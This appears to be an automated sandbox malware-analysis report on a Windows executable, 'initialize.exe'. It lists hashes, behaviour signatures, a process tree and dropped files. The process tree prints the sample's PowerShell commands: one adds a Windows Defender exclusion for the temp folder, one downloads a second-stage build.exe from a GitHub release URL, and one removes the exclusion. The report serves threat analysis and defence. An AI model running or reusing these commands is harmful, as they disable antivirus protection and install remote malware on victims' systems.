Overview

overview

10

Static

static

5

initialize.exe

windows7-x64

6

initialize.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    25/03/2025, 23:04

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    initialize.exe

  • Size

    57KB

  • MD5

    f40b4d5dc143233298f0a5e78dd68a0f

  • SHA1

    87d23f60239c692e96ce5375ada123bbc3ebccc0

  • SHA256

    9e13904bbfb3b36110a58fc9f339fc82957e5c938c79bd87d9bcbbf04dcd65f7

  • SHA512

    0b8ab10ea18812a688b940946ddeeb9de83889a53a27efc6906c22735e72bcf98df6350e460f6090f043360b96b8349b9337ab3c9510a6f5b6fae2d0e1726f4b

  • SSDEEP

    1536:6rPJVKjbcknWSOYvTfkWkFM79yQVuuSCRc:6LJMjbcHDdMwQ7

Score
6/10
defense_evasionexecutionupx

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Hide Artifacts: Ignore Process Interrupts 1 TTPs 2 IoCs

    Command interpreters often include specific commands/flags that ignore errors and other hangups.

    defense_evasion
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\initialize.exe
    "C:\Users\Admin\AppData\Local\Temp\initialize.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2820
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6FE3.tmp\6FE4.tmp\6FE5.bat C:\Users\Admin\AppData\Local\Temp\initialize.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2748
      • C:\Windows\system32\net.exe
        net session
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2616
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 session
          4⤵
            PID:1988
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Hide Artifacts: Ignore Process Interrupts
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2932
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/build.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\build.exe\" -ErrorAction Stop"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2608
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -Command "Remove-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"
          3⤵
          • Hide Artifacts: Ignore Process Interrupts
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2172

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\6FE3.tmp\6FE4.tmp\6FE5.bat
      Filesize

      2KB

      MD5

      1c935ef28fdfd394b770d945d7f04d76

      SHA1

      29e251c3c40ce4ad1b2984bf26b444aa045d9b21

      SHA256

      aa58e1df5882878a44687853f47d10b655c3fe888ec20fb99446305f5d38c681

      SHA512

      a9e60f2ac4aec15a3ba0a95df224449f64777a027357792247dd597529542e79128aec996c89ff86a1654911b4b763c577d3c3d2f38c59b02b280b8ad824e7e1

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JNKQXIQNYWGL211M0IUV.temp
      Filesize

      7KB

      MD5

      b9e647e1d7e60a0c56a8fe05d5ac3738

      SHA1

      d501c69c15e706b5c08ed1af2ad75a52b9635cc3

      SHA256

      925f8d9bf05d99e578936fcf0b46fe257a9d86d3a4db2c1555190466298ff9bb

      SHA512

      6989475538bc7120d6ff7921185165790057f8f7f2170f7335189d589ac419a6afd9a4873baac0542e82096a51d9c3c1c979e0234626ab455409d86a2b477a0c

      Download Submit

    • memory/2608-22-0x00000000026E0000-0x00000000026E8000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2608-21-0x000000001B610000-0x000000001B8F2000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2820-0-0x0000000140000000-0x0000000140027000-memory.dmp

      Filesize

      156KB

      Download

    • memory/2820-28-0x0000000140000000-0x0000000140027000-memory.dmp

      Filesize

      156KB

      Download

    • memory/2932-12-0x000007FEF6450000-0x000007FEF6DED000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2932-11-0x000007FEF6450000-0x000007FEF6DED000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2932-13-0x000007FEF6450000-0x000007FEF6DED000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2932-14-0x000007FEF6450000-0x000007FEF6DED000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2932-15-0x000007FEF6450000-0x000007FEF6DED000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2932-10-0x000007FEF6450000-0x000007FEF6DED000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2932-9-0x0000000002890000-0x0000000002898000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2932-8-0x000000001B630000-0x000000001B912000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2932-7-0x000007FEF670E000-0x000007FEF670F000-memory.dmp

      Filesize

      4KB

      Download